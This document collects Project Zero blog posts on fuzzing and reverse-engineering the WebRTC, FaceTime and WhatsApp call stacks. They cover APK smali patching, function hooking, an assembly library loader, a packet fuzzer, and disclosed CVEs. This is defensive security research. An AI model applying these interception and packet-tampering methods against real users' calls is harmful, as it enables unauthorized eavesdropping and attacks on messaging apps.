Project Zero

Syndikovat obsah
News and updates from the Project Zero team at Google
Aktualizace: 18 min 20 sek zpět

Adventures in Video Conferencing Part 4: What Didn't Work Out with WhatsApp

12 Prosinec, 2018 - 19:54
Posted by Natalie Silvanovich, Project Zero
Not every attempt to find bugs is successful. When looking at WhatsApp, we spent a lot of time reviewing call signalling hoping to find a remote, interaction-less vulnerability. No such bugs were found. We are sharing our work with the hopes of saving other researchers the time it took to go down this very long road. Or maybe it will give others ideas for vulnerabilities we didn’t find.
As discussed in Part 1, signalling is the process through which video conferencing peers initiate a call. Usually, at least part of signalling occurs before the receiving peer answers the call. This means that if there is a vulnerability in the code that processes incoming signals before the call is answered, it does not require any user interaction.
WhatsApp implements signalling using a series of WhatsApp messages. Opening libwhatsapp.so in IDA, there are several native calls that handle incoming signalling messages.
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAckJava_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfoJava_com_whatsapp_voipcalling_Voip_nativeHandleCallRekeyRequestJava_com_whatsapp_voipcalling_Voip_nativeHandleCallFlowControlJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferReceiptJava_com_whatsapp_voipcalling_Voip_nativeHandleCallAcceptReceiptJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAcceptJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferPreAcceptJava_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChangedJava_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChangedAckJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferRejectJava_com_whatsapp_voipcalling_Voip_nativeHandleCallTerminateJava_com_whatsapp_voipcalling_Voip_nativeHandleCallTransportJava_com_whatsapp_voipcalling_Voip_nativeHandleCallRelayLatencyJava_com_whatsapp_voipcalling_Voip_nativeHandleCallRelayElectionJava_com_whatsapp_voipcalling_Voip_nativeHandleCallInterruptedJava_com_whatsapp_voipcalling_Voip_nativeHandleCallMutedJava_com_whatsapp_voipcalling_Voip_nativeHandleWebClientMessage
Using apktool to extract the WhatsApp APK, it appears these natives are called from a loop in the com.whatsapp.voipcalling.Voip class. Looking at the smali, it looks like signalling messages are sent as WhatsApp messages via the WhatsApp server, and this loop handles the incoming messages.
Immediately, I noticed that there was a peer-to-peer encrypted portion of the message (the rest of the message is only encrypted peer-to-server). I thought this had the highest potential of reaching bugs, as the server would not be able to sanitize the data. In order to be able to read and alter encrypted packets, I set up a remote server with a python script that opens a socket. Whenever this socket receives data, the data is displayed on the screen, and I have the option of either sending the unaltered packet or altering the packet before it is sent. I then looked for the point in the WhatsApp smali where messages are peer-to-peer encrypted.
Since WhatsApp uses libsignal for peer-to-peer encryption, I was able to find where messages are encrypted by matching log entries. I then added smali code that sends a packet with the bytes of the message to the server I set up, and then replaces it with the bytes the server returns (changing the size of the byte array if necessary). This allowed me to view and alter the peer-to-peer encrypted message. Making a call using this modified APK, I discovered that the peer-to-peer message was always exactly 24 bytes long, and appeared to be random. I suspected that this was the encryption key used by the call, and confirmed this by looking at the smali.
A single encryption key doesn’t have a lot of potential for malformed data to lead to bugs (I tried lengthening and shortening it to be safe, but got nothing but unexploitable null pointer issues), so I moved on to looking at the peer-to-server encrypted messages. Looking at the Voip loop in smali, it looked like the general flow is that the device receives an incoming message, it is deserialized and if it is of the right type, it is forwarded to the messaging loop. Then certain properties are read from the message, and it is forwarded to a processing function based on its type. Then the processing function reads even more properties, and calls one of the above native methods with the properties as its parameters. Most of these functions have more than 20 parameters.
Many of these functions perform logging when they are called, so by making a test call, I could figure out which functions get called before a call is picked up. It turns out that during a normal incoming call, the device only receives an offer and calls Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer, and then spawns the incoming call screen in WhatsApp. All the other signal types are not used until the call is picked up.
An immediate question I had was whether other signal types are processed if they are received before a call is picked up. Just because the initiating device never sends these signal types before the call is picked up doesn’t mean the receiving device wouldn’t process them if it received them.
Looking through the APK smali, I found the class com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback that has several methods like sendOffer and sendAccept that appeared to send the messages that are processed by these native calls. I changed sendOffer to call other send methods, like sendAccept instead of its normal messaging functionality. Trying this, I discovered that the Voip loop will process any signal type regardless of whether the call has been answered. The native methods will then parse the parameters, process them and put the results in a buffer, and then call a single method to process the buffer. It is only at that point processing will stop if the message is of the wrong type.I then reviewed all of the above methods in IDA. The code was very conservatively written, and most needed checks were performed. However, there were a few areas that potentially had bugs that I wanted to investigate more. I decided that changing the parameters to calls in the com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback was too slow to test the number of cases I wanted to test, and went looking for another way to alter the messages.
Ideally, I wanted a way to pass peer-to-server encrypted messages to my server before they were sent, so I could view and alter them. I went through the WhatsApp APK smali looking for a point after serialization but before encryption where I could add my smali function that sends and alters the packets. This was fairly difficult and time consuming, and I eventually put my smali in every method that wrote to a non-file ByteArrayOutputStream in the com.whatsapp.protocol and com.whatsapp.messaging packages (about 10 total) and looked for where it got called. I figured out where it got called, and fixed the class so that anywhere a byte array was written out from a stream, it got sent to my server, and removed the other calls. (If you’re following along at home, the smali file I changed included the string “Double byte dictionary token out of range”, and the two methods I changed contained calls to toByteArray, and ended with invoking a protocol interface.) Looking at what got sent to my server, it seemed like a reasonably comprehensive collection of WhatsApp messages, and the signalling messages contained what I thought they would.
WhatsApp messages are in a compressed XMPP format. A lot of parsers have been written for reverse engineering this protocol, but I found the whatsapp-reveng parser worked the best. I did have to replace the tokens in whatsapp_defines.py with a list extracted from the APK for it to work correctly though. This made it easier to figure out what was in each packet sent to the server.
Playing with this a bit, I discovered that there are three types of checks in WhatsApp signalling messages. First, the server validates and modifies incoming signalling messages. Secondly, the messages are deserialized, and this can cause errors if the format is incorrect, and generally limits the contents of the Java message object that is passed on. Finally, the native methods perform checks on their parameters.
These additional checks prevented several of the areas I thought were problems from actually being problems. For example, there is a function called by Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer that takes in an array of byte arrays, an array of integers and an array of booleans. It uses these values to construct candidates for the call. It checks that the array of byte arrays and the array of integers are of the same length before it loops through them, using values from each, but it does not perform the same check on the boolean array. I thought that this could go out of bounds, but it turns out that the integer and booleans are serialized as a vector of <int,bool> pairs, and the arrays are then copied from the vector, so it is not actually possible to send arrays with different lengths.
One area of the signalling messages that looked especially concerning was the voip_options field of the message. This field is never sent from the sending device, but is added to the message by the server before it is forwarded to the receiving device. It is a buffer in JSON format that is processed by the receiving device and contains dozens of configuration parameters.
{"aec":{"offset":"0","mode":"2","echo_detector_mode":"4","echo_detector_impl":"2","ec_threshold":"50","ec_off_threshold":"40","disable_agc":"1","algorithm":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"aecm_adapt_step_size":"2"},"agc":{"mode":"0","limiterenable":"1","compressiongain":"9","targetlevel":"1"},"bwe":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"encode":{"complexity":"5","cbr":"0"},"init_bwe":{"use_local_probing_rx_bitrate":"1","test_flags":"982188032","max_tx_rott_based_bitrate":"128000","max_bytes":"8000","max_bitrate":"350000"},"ns":{"mode":"1"},"options":{"connecting_tone_desc": "test","video_codec_priority":"2","transport_stats_p2p_threshold":"0.5","spam_call_threshold_seconds":"55","mtu_size":"1200","media_pipeline_setup_wait_threshold_in_msec":"1500","low_battery_notify_threshold":"5","ip_config":"1","enc_fps_over_capture_fps_threshold":"1","enable_ssrc_demux":"1","enable_preaccept_received_update":"1","enable_periodical_aud_rr_processing":"1","enable_new_transport_stats":"1","enable_group_call":"1","enable_camera_abtest_texture_preview":"1","enable_audio_video_switch":"1","caller_end_call_threshold":"1500","call_start_delay":"1200","audio_encode_offload":"1","android_call_connected_toast":"1"}Sample voip_options (truncated)
If a peer could send a voip_options parameter to another peer, it would open up a lot of attack surface, including a JSON parser and the processing of these parameters. Since this parameter almost always appears in an offer, I tried modifying an offer to contain one, but the offer was rejected by the WhatsApp server with error 403. Looking at the binary, there were three other signal types in the incoming call flow that could accept a voip_options parameter. Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAccept and Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChanged were accepted by the server if a voip_options parameter was included, but it was stripped before the message was sent to the peer. However, if a voip_options parameter was attached to a Java_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfo message, it would be forwarded to the peer device. I confirmed this by sending malformed JSON looking at the log of the receiving device for an error.
The voip_options parameter is processed by WhatsApp in three stages. First, the JSON is parsed into a tree. Then the tree is transformed to a map, so JSON object properties can be looked up efficiently even though there are dozens of them. Finally, WhatsApp goes through the map, looking for specific parameters and processes them, usually copying them to an area in memory where they will set a value relevant to the call being made.
Starting off with the JSON parser, it was clearly the PJSIP JSON parser. I compiled the code and fuzzed it, and only found one minor out-of-bounds read issue.
I then looked at the conversion of the JSON tree output from the parser into the map. The map is a very efficient structure. It is a hash map that uses FarmHash as its hashing algorithm, and it is designed so that the entire map is stored in a single slab of memory, even if the JSON objects are deeply nested. I looked at many open source projects that contained similar structures, but could not find one that looked similar. I looked through the creation of this structure in great detail, looking especially for type confusion bugs as well as errors when the memory slab is expanded, but did not find any issues.
I also looked at the functions that go through the map and handle specific parameters. These functions are extremely long, and I suspect they are generated using a code generation tool such as bison. They mostly copy parameters into static areas of memory, at which point they become difficult to trace. I did not find any bugs in this area either. Other than going through parameter names and looking for value that seemed likely to cause problems, I did not do any analysis of how the values fetched from JSON are actually used. One parameter that seemed especially promising was an A/B test parameter called setup_video_stream_before_accept. I hoped that setting this would allow the device to accept RTP before the call is answered, which would make RTP bugs interaction-less, but I was unable to get this to work.
In the process of looking at this code, it became difficult to verify its functionality without the ability to debug it. Since WhatsApp ships an x86 library for Android, I wondered if it would be possible to run the JSON parser on Linux.
Tavis Ormandy created a tool that can load the libwhatsapp.so library on Linux and run native functions, so long as they do not have a dependency on the JVM. It works by patching the .dynamic ELF section to remove unnecessary dependencies by replacing DT_NEEDED tags with DT_DEBUG tags. We also needed to remove constructors and deconstructors by changing the DT_FINI_ARRAYSZ and DT_INIT_ARRAYSZ to zero. With these changs in place, we could load the library using dlopen() and use dlsym() and dlclose() as normal.
Using this tool, I was able to look at the JSON parsing in more detail. I also set up distributed fuzzing of the JSON binary. Unfortunately, it did not uncover any bugs either.
Overall, WhatsApp signalling seemed like a promising attack surface, but we did not find any vulnerabilities in it. There were two areas where we were able to extend the attack surface beyond what is used in the basic call flow. First, it was possible to send signalling messages that should only be sent after a call is answered before the call is answered, and they were processed by the receiving device. Second, it was possible for a peer to send voip_options JSON to another device. WhatsApp could reduce the attack surface of signalling by removing these capabilities.
I made these suggestions to WhatsApp, and they responded that they were already aware of the first issue as well as variants of the second issue. They said they were in the process of limiting what signalling messages can be processed by the device before a call is answered. They had already fixed other issues where a peer can send voip_options JSON to another peer, and fixed the method I reported as well. They said they are also considering adding cryptographic signing to the voip_options parameter so a device can verify it came from the server to further avoid issues like this. We appreciate their quick resolution of the voip_options issue and strong interest in implementing defense-in-depth measures.
In Part 5, we will discuss the conclusions of our research and make recommendations for better securing video conferencing.
Kategorie: Hacking & Security

Adventures in Video Conferencing Part 3: The Even Wilder World of WhatsApp

11 Prosinec, 2018 - 18:42
Posted by Natalie Silvanovich, Project Zero
WhatsApp is another application that supports video conferencing that does not use WebRTC as its core implementation. Instead, it uses PJSIP, which contains some WebRTC code, but also contains a substantial amount of other code, and predates the WebRTC project. I fuzzed this implementation to see if it had similar results to WebRTC and FaceTime.Fuzzing Set-upPJSIP is open source, so it was easy to identify the PJSIP code in the Android WhatsApp binary (libwhatsapp.so). Since PJSIP uses the open source library libsrtp, I started off by opening the binary in IDA and searching for the string srtp_protect, the name of the function libsrtp uses for encryption. This led to a log entry emitted by a function that looked like srtp_protect. There was only one function in the binary that called this function, and called memcpy soon before the call. Some log entries before the call contained the file name srtp_transport.c, which exists in the PJSIP repository. The log entries in the WhatsApp binary say that the function being called is transport_send_rtp2 and the PJSIP source only has a function called transport_send_rtp, but it looks similar to the function calling srtp_protect in WhatsApp, in that it has the same number of calls before and after the memcpy. Assuming that the code in WhatsApp is some variation of that code, the memcpy copies the entire unencrypted packet right before it is encrypted.
Hooking this memcpy seemed like a possible way to fuzz WhatsApp video calling. I started off by hooking memcpy for the entire app using a tool called Frida. This tool can easily hook native function in Android applications, and I was able to see calls to memcpy from WhatsApp within minutes. Unfortunately though, video conferencing is very performance sensitive, and a delay sending video packets actually influences the contents of the next packet, so hooking every memcpy call didn’t seem practical. Instead, I decided to change the single memcpy to point to a function I wrote.
I started off by writing a function in assembly that loaded a library from the filesystem using dlopen, retrieved a symbol by calling dlsym and then called into the library. Frida was very useful in debugging this, as it could hook calls to dlopen and dlsym to make sure they were being called correctly. I overwrote a function in the WhatsApp GIF transcoder with this function, as it is only used in sending text messages, which I didn’t plan to do with this altered version. I then set the memcpy call to point to this function instead of memcpy, using this online ARM branch finder.
sub_2F8CCMOV             X21, X30MOV             X22, X0MOV             X23, X1MOV             X20, X2MOV             X1, #1ADRP            X0, #aDataDataCom_wh@PAGE ; "/data/data/com.whatsapp/libn.so"ADD             X0, X0, #aDataDataCom_wh@PAGEOFF ; "/data/data/com.whatsapp/libn.so"BL              .dlopenADRP            X1, #aApthread@PAGE ; "apthread"ADD             X1, X1, #aApthread@PAGEOFF ; "apthread"BL              .dlsymMOV             X8, X0MOV             X0, X22MOV             X1, X23MOV             X2, X20NOPBLR             X8MOV             X30, X21RETThe library loading function
I then wrote a library for Android which had the same parameters as memcpy, but fuzzed and copied the buffer instead of just copying it, and put it on the filesystem where it would be loaded by dlopen. I then tried making a WhatsApp call with this setup. The video call looked like it was being fuzzed and crashed in roughly fifteen minutes.Replay Set-up
To replay the packets I added logging to the library, so that each buffer that was altered would also be saved to a file. Then I created a second library that copied the logged packets into the buffer being copied instead of altering it. This required modifying the WhatsApp binary slightly, because the logged packet will usually not be the same size as the packet currently being sent. I changed the length of the hooked memcpy to be passed by reference instead of by value, and then had the library change the length to the length of the logged packet. This changed the value of the length so that it would be correct for the call to srtp_protect. Luckily, the buffer that the packet is copied into is a fixed length, so there is no concern that a valid packet will overflow the buffer length. This is a common design pattern in RTP processing that improves performance by reducing length checks. It was also helpful in modifying FaceTime to replay packets of varying length, as described in the previous post.
This initial replay setup did not work, and looking at the logged packets, it turned out that WhatsApp uses four streams with different SSRCs for video conferencing (possibly one for video, one for audio, one for synchronization and one for good luck). The streams each had only one payload type, and they were all different, so it was fairly easy to map each SSRC to its stream. So I modified the replay library to determine the current SSRC for each stream based on the payload types of incoming packets, and then to replace the SSRC of the replayed packets with the correct one based on their payload type. This reliably replayed a WhatsApp call. I was then able to fuzz and reproduce crashes on WhatsApp.ResultsUsing this setup, I reported one heap corruption issue on WhatsApp, CVE-2018-6344. This issue has since been fixed. After this issue was resolved, fuzzing did not yield any additional crashes with security impact, and we moved on to other methodologies. Part 4 will describe our other (unsuccessful) attempts to find vulnerabilities in WhatsApp.
Kategorie: Hacking & Security

Adventures in Video Conferencing Part 2: Fun with FaceTime

5 Prosinec, 2018 - 19:43
Posted by Natalie Silvanovich, Project Zero
FaceTime is Apple’s video conferencing application for iOS and Mac. It is closed source, and does not appear to use any third-party libraries for its core functionality. I wondered whether fuzzing the contents of FaceTime’s audio and video streams would lead to similar results as WebRTC.Fuzzing Set-up
Philipp Hancke performed an excellent analysis of FaceTime’s architecture in 2015. It is similar to WebRTC, in that it exchanges signalling information in SDP format and then uses RTP for audio and video streams. Looking at the FaceTime implementation on a Mac, it seemed the bulk of the calling functionality of FaceTime is in a daemon called avconferenced. Opening up the binary that supports its functionality, AVConference in IDA, it contains a function called SRTPEncryptData. This function then calls CCCryptorUpdate, which appeared to encrypt RTP packets below the header.
To do a quick test of whether fuzzing was likely to be effective, I hooked this function and altered the underlying encrypted data. Normally, this can be done by setting the DYLD_INSERT_LIBRARIES environment variable, but since avconferenced is a daemon that restarts automatically when it dies, there wasn’t an easy way to set an environment variable. I eventually used insert_dylib to alter the AVConference binary to load a library on startup, and restarted the process. The library loaded used DYLD_INTERPOSE to replace CCCryptorUpdate with a version that fuzzed every input buffer (using fuzzer q from Part 1) before it was processed. This implementation had a lot of problems: it fuzzed both encryption and decryption, it affected every call to CCCryptorUpdate from avconferenced, not just ones involved in SRTP and there was no way to reproduce a crash. But using the modified FaceTime to call an iPhone led to video output that looked corrupted, and the phone crashed in a few minutes. This confirmed that this function was indeed where FaceTime calls are encrypted, and that fuzzing was likely to find bugs.
I made a few changes to the function that hooked CCCryptorUpdate to attempt to solve these problems. I limited fuzzing the input buffer to the two threads that write audio and video output to RTP, which also solved the problem of decrypted packets being fuzzed, as these threads only ever encrypt. I then added functionality that wrote the encrypted, fuzzed contents of each packet to a series of log files, so that test cases could be replayed. This required altering the sandbox of avconferenced so that it could write files to the log location, and adding spinlocks to the hook, as calling CCCryptorUpdate is thread safe, but logging packets isn’t. Call Replay
I then wrote a second library that hooks CCCryptorUpdate and replays packets logged by the first library by copying the logged packets in sequence into the packet buffers passed into the function. Unfortunately, this required a small modification to the AVConference binary, as the SRTPEncryptData function does not respect the length returned by CCCryptorUpdate; instead, it assumes that the length of the encrypted data is the same as the length as the plaintext data, which is reasonable when CCCryptorUpdate isn’t being hooked. Since SRTPEncryptData always uses a large fixed-size buffer for encryption, and encryption is in-place, I changed the function to retrieve the length of the encrypted buffer from the very end of the buffer, which was set in the hooked CCCryptorUpdate call. This memory is unlikely to be used for other purposes due to the typical shorter length of RTP packets. Unfortunately though, even though the same encrypted data was being replayed to the target, it wasn’t being processed correctly by the receiving device.
To understand why requires an explanation of how RTP works. An RTP packet has the following format.

It contains several fields that impact how its payload is interpreted. The SSRC is a random identifier that identifies a stream. For example, in FaceTime the audio and video streams have different SSRCs. SSRCs can also help differentiate between streams in a situation where a user could potentially have an unlimited number of streams, for example, multiple participants in a video call. RTP packets also have a payload type (PT in the diagram) which is used to differentiate different types of data in the payload. The payload type for a certain data type is consistent across calls. In FaceTime, the video stream has a single payload type for video data, but the audio stream has two payload types, likely one for audio data and the other for synchronization. The marker (M in the diagram) field of RTP is also used by FaceTime to represent when a packet is fragmented, and needs to be reassembled.
From this it is clear that simply copying logged data into the current encrypted packet won’t function correctly, because the data needs to have the correct SSRC, payload type and marker, or it won’t be interpreted correctly. This wasn’t necessary in WebRTC, because I had enough control over WebRTC that I could create a connection with a single SSRC and payload type for fuzzing purposes. But there is no way to do this in FaceTime, even muting a video call leads to silent audio packets being sent as opposed to the audio stream shutting down. So these values needed to be manually corrected.
An RTP feature called extensions made correcting these fields difficult. An extension is an optional header that can be added to an RTP packet. Extensions are not supposed to depend on the RTP payload to be interpreted, and extensions are often used to transmit network or display features. Some examples of supported extensions include the orientation extension, which tells the endpoint the orientation of the receiving device and the mute extension, which tells the endpoint whether the receiving device is muted.
Extensions mean that even if it is possible to determine the payload type, marker and SSRC of data, this is not sufficient to replay the exact packet that was sent. Moreover, FaceTime creates extensions after the packet is encrypted, so it is not possible to create the complete RTP packet by hooking CCCryptorUpdate, because extensions could be added later.
At this point, it seemed necessary to hook sendmsg as well as CCCryptorUpdate. This would allow the outgoing RTP header to be modified once it is complete. There were a few challenges in doing this. To start, audio and video packets are sent by different threads in FaceTime, and can be reordered between the time they are encrypted and the time they are sent by sendmsg. So I couldn’t assume that if sendmsg received an RTP packet that it was necessarily the last one that was encrypted. There was also the problem that SSRCs are dynamic, so replaying an RTP packet with the same SSRC it is recorded with won’t work, it needs to have the new SSRC for the audio or video stream.
Note that in MacOS Mojave, FaceTime can call sendmsg via either the AVConference binary or the IDSFoundation binary, depending on the network configuration. So to capture and replay unencrypted RTP traffic on newer systems, it is necessary  to hook CCCryptorUpdate in AConference and sendmsg in IDSFoundation (AVConference calls into IDSFoundation when it calls sendmsg). Otherwise, the process is the same as on older systems.
I ended up implementing a solution that recorded packets by recording the unencrypted payload, and then recorded its RTP header, and using a snippet of the encrypted payload to pair headers with the correct unencrypted payload. Then to replay packets, the packets encrypted in CCCryptorUpdate were replaced with the logged packets, and once the encrypted payload came through to sendmsg, the header was replaced with the logged one for that payload. Fortunately, the two streams with unique SSRCs used by FaceTime do not share any payload types, so it was possible to determine the new SSRC for each stream by waiting for an incoming packet with the correct payload type. Then in each subsequent packet, the SSRC was replaced with the correct one.
Unfortunately, this still did not replay a FaceTime call correctly, and calls often experienced decryption failures. I eventually determined that audio and video on FaceTime are encrypted with different keys, and updated the replay script to queue the CCCryptor used by CCCryptorUpdate function based on whether it was audio or video content. Then in sendmsg, the entire logged RTP packet, including the unencrypted payload, was copied into the outgoing packet, the SSRC was fixed, and then the payload encrypted with the next CCCryptor out of the appropriate queue. If a CCCryptor wasn’t available, outgoing packets were dropped until a new one was created. At this point, it was possible to stop using the modified AVConference binary, as all the packet modification was now happening in sendmsg. This implementation still had reliability problems.
Digging more deeply into how FaceTime encryption works, packets are encrypted in CTS mode, which requires a counter. The counter is initialized to a unique value for each packet that is sent. During the initialization of the RTP stream, the peers exchange two 16-byte random tokens, one for audio and one for video. The counter value for each packet is then calculated by exclusive or-ing the token with several values found in the packet, including the SSRC and the sequence number. Only one value in this calculation, the sequence number, changes between each packet. So it is possible to calculate the counter value for each packet by knowing the initial counter value and sequence number, which can be retrieved by hooking CCCryptorCreateWithMode. The sequence number is xor-ed with the random token at index 0x12 when FaceTime constructs a counter, so by xor-ing this location with the initial sequence number and then a packet’s sequence number, the counter value for that packet can be calculated. The key can also be retrieved by hooking CCCryptorCreateWithMode.This allowed me to dispense with queuing cryptors, as I now had all the information I needed to construct a cryptor for any packet. This allowed for packets to be encrypted faster and more accurately.
Sequence numbers still posed a problem though, as the initial sequence number of an RTP stream is randomly generated at the beginning of the call, and is different between subsequent calls. Also, sequence numbers are used to reconstruct video streams in order, so they need to be correct. I altered the replay tool determine the starting sequence number of each stream, and then calculate the difference between the starting sequence number of each logged stream and the sequence number of the logged packet and then add it to this value. These two changes finally made the replay tool work, though replay gets slower and slower as a stream is replayed due to dropped packets.   
Results
Using this setup, I was able to fuzz FaceTime calls and reproduce the crashes. I reported three bugs in FaceTime based on this work. All these issues have been fixed in recent updates.
CVE-2018-4366 is an out-of-bounds read in video processing that occurs on Macs only.
CVE-2018-4367 is a stack corruption vulnerability that affects iOS and Mac. There are a fair number of variables on the stack of the affected function before the stack cookie, and several fuzz crashes due to this issue caused segmentation faults as opposed to stack_chk crashes, so it is likely exploitable.
CVE-2018-4384 is a kernel heap corruption issue in video processing that affects iOS. It is likely similar to this vulnerability found by Adam Donenfeld of Zimperium.
All of these issues took less than 15 minutes of fuzzing to find on a live device. Unfortunately, this was the limit of fuzzing that could be performed on FaceTime, as it would be difficult to create a command line fuzzing tool with coverage like we did for WebRTC as it is closed source.
In Part 3, we will look at video calling in WhatsApp.
Kategorie: Hacking & Security

Adventures in Video Conferencing Part 1: The Wild World of WebRTC

4 Prosinec, 2018 - 20:40
Posted by Natalie Silvanovich, Project Zero
Over the past five years, video conferencing support in websites and applications has exploded. Facebook, WhatsApp, FaceTime and Signal are just a few of the many ways that users can make audio and video calls across networks. While a lot of research has been done into the cryptographic and privacy properties of video conferencing, there is limited information available about the attack surface of these platforms and their susceptibility to vulnerabilities. We reviewed the three most widely-used video conferencing implementations. In this series of blog posts, we describe what we found.
This part will discuss our analysis of WebRTC. Part 2 will cover our analysis of FaceTime. Part 3 will discuss how we fuzzed WhatsApp. Part 4 will describe some attacks against WhatsApp that didn’t work out. And finally, Part 5 will discuss the future of video conferencing and steps that  developers can take to improve the security of their implementation.Typical Video Conferencing Architecture
All the video conferencing implementations we investigated allow at least two peers anywhere on the Internet to communicate through audiovisual streams. Implementing this capability so that it is reliable and has good audio and video quality presents several challenges. First, the peers need to be able to find each other and establish a connection regardless of NATs or other network infrastructure. Then they need to be able to communicate, even though they could be on different platforms, application versions or browsers. Finally, they need to maintain audio and video quality, even if the connection is low-bandwidth or noisy.
Almost all video conferencing solutions have converged on a single architecture. It assumes that two peers can communicate via a secure, integrity checked channel which may have low bandwidth or involve an intermediary server, and it allows them to create a faster, higher-bandwidth peer-to-peer channel.
The first stage in creating a connection is called signalling. It is the process through which the two peers exchange the information they will need to create a connection, including network addresses, supported codecs and cryptographic keys. Usually, the calling peer sends a call request including information about itself to the receiving peer, and then the receiving peer responds with similar information. SDP is a common protocol for exchanging this information, but it is not always used, and most implementations do not conform to the specification. It is common for mobile messaging apps to send this information in a specially formatted message, sent through the same channel text messages are sent. Websites that support video conferencing often use WebSockets to exchange information, or exchange it via HTTPS using the webserver as an intermediary.
Once signalling is complete, the peers find a way to route traffic to each other using the STUN, TURN and ICE protocols. Based on what these protocols determine, the peers can create UDP, UDP-over-STUN and occasionally TCP connections based of what is favorable for the network conditions.
Once the connection has been made, the peers communicate using Real-time Transport Protocol. Though this protocol is standardized, most implementations deviate somewhat from the standard. RTP can be encrypted using a protocol called Secure RTP (SRTP), and some implementations also encrypt streams using DTLS. Under the encryption envelope, RTP supports features that allow multiple streams and formats of data to be exchanged simultaneously. Then, based on how RTP classifies the data, it is passed on to other processing, such as video codecs.  Stream Control Transmission Protocol (SCTP) is also sometimes used to exchange small amounts of data (for example a text message on top of a call) during video conferencing, but it is less commonly used than RTP.
Even when it is encrypted, RTP often doesn’t include integrity protection, and if it does, it usually doesn’t discard malformed packets. Instead, it attempts to recover them using strategies such as Forward Error Correction (FEC). Most video conferencing solutions also detect when a channel is noisy or low-bandwidth and attempt to handle the situation in a way that leads to the best audio and video quality, for example, sending fewer frames or changing codecs. Real Time Control Protocol (RTCP) is used to exchange statistics on network quality and coordinate adjusting properties of RTP streams to adapt to network conditions.WebRTC
WebRTC is an open source project that enables video conferencing. It is by far the most commonly used implementation. Chrome, Safari, Firefox, Facebook Messenger, Signal and many other mobile applications use WebRTC. WebRTC seemed like a good starting point for looking at video conferencing as it is heavily used, open source and reasonably well-documented.WebRTC Signalling
I started by looking at WebRTC signalling, because it is an attack surface that does not require any user interaction. Protocols like RTP usually start being processed after a user has picked up the video call, but signalling is performed before the user is notified of the call. WebRTC uses SDP for signalling.
I reviewed the WebRTC SDP parser code, but did not find any bugs. I also compiled it so it would accept an SDP file on the commandline and fuzzed it, but I did not find any bugs through fuzzing either. I later discovered that WebRTC signalling is not implemented consistently across browsers anyhow. Chrome uses the main WebRTC implementation, Safari has branched slightly and Firefox uses their own implementation. Most mobile applications that use WebRTC implement their own signalling in a protocol that is not SDP as well. So it is not likely that a bug in WebRTC signalling would affect a wide variety of targets.
RTP Fuzzing
I then decided to look at how RTP is processed in WebRTC. While RTP is not an interaction-less attack surface because the user usually has to answer the call before RTP traffic is processed, picking up a call is a reasonable action to expect a user to take. I started by looking at the WebRTC source, but it is very large and complex, so I decided fuzzing would be a better approach.
The WebRTC repository contains fuzzers written for OSS-Fuzz for every protocol and codec supported by WebRTC, but they do not simulate the interactions between the various parsers, and do not maintain state between test cases, so it seemed likely that end-to-end fuzzing would provide additional coverage.
Setting up end-to-end fuzzing was fairly time intensive, so to see if it was likely to find many bugs, I altered Chrome to send malformed RTP packets. I changed the srtp_protect function in libsrtp so that it ran the following fuzzer on every packet:
void fuzz(char* buf, int len){
int q = rand()%10;
if (q == 7){ int ind = rand()%len; buf[ind] = rand(); }
if(q == 5){ for(int i = 0; i < len; i++) buf[i] = rand();
}RTP fuzzer (fuzzer q)
When this version was used to make a WebRTC call to an unmodified instance of Chrome, it crashed roughly every 30 seconds.
Most of the crashes were due to divide-by-zero exceptions, which I submitted patches for, but there were three interesting crashes. I reproduced them by altering the WebRTC source in Chrome so that it would generate the packets that caused the same crashes, and then set up a standalone build of WebRTC to reproduce them, so that it was not necessary to rebuild Chrome to reproduce the issues.
The first issue, CVE-2018-6130 is an out-of-bounds memory issue related to the use of std::map find in processing VP9 (a video codec). In the following code, the value t10_pic_idx is pulled out of an RTP packet unverified (GOF stands for group of frames).
if (frame->frame_type() == kVideoFrameKey) {    ...    GofInfo info = gof_info_.find(codec_header.tl0_pic_idx)->second;    FrameReceivedVp9(frame->id.picture_id, &info);    UnwrapPictureIds(frame);    return kHandOff;  }

If this value does not exist in the gof_info_ array, std::map::find returns the end value of the map, which points to one element past the allocated values for the map. Depending on memory layout, dereferencing this iterator will either crash or return the contents of unallocated memory.
The second issue, CVE-2018-6129 is a more typical out-of-bounds read issue, where the index of a field is read out of an RTP packet, and not verified before it is used to index a vector.
The third issue, CVE-2018-6157 is a type confusion issue that occurs when a packet that looks like a VP8 packet is sent to the H264 parser. The packet will eventually be treated like an H264 packet even though it hasn’t gone through the necessary checks for H264. The impact of this issue is also limited to reading out of bounds.
There are a lot of limitations to the approach of fuzzing in a browser. It is very slow, the issues are difficult to reproduce, and it is difficult to fuzz a variety of test cases, because each call needs to be started manually, and certain properties, such as the default codec, can’t change in the middle of the call. After I reported these issues, the WebRTC team suggested that I use the video_replay tool, which can be used to replay RTP streams recorded in a patched browser. The tool was not able to reproduce a lot of my issues because they used non-default WebRTC settings configured through signalling, so I added the ability to load a configuration file alongside the RTP dump to this tool. This made it possible to quickly reproduce vulnerabilities in WebRTC.
This tool also had the benefit of enabling much faster fuzzing, as it was possible to fuzz RTP by fuzzing the RTP dump file and loading it into video_replay. There were some false positives, as it was also possible that fuzzing caused bugs in parsing the RTP dump file format, but most of the bugs were actually in RTP processing.Fuzzing with the video_replay tool with code coverage and ASAN enabled led to four more bugs. We ran the fuzzer on 50 cores for about two weeks to find these issues.
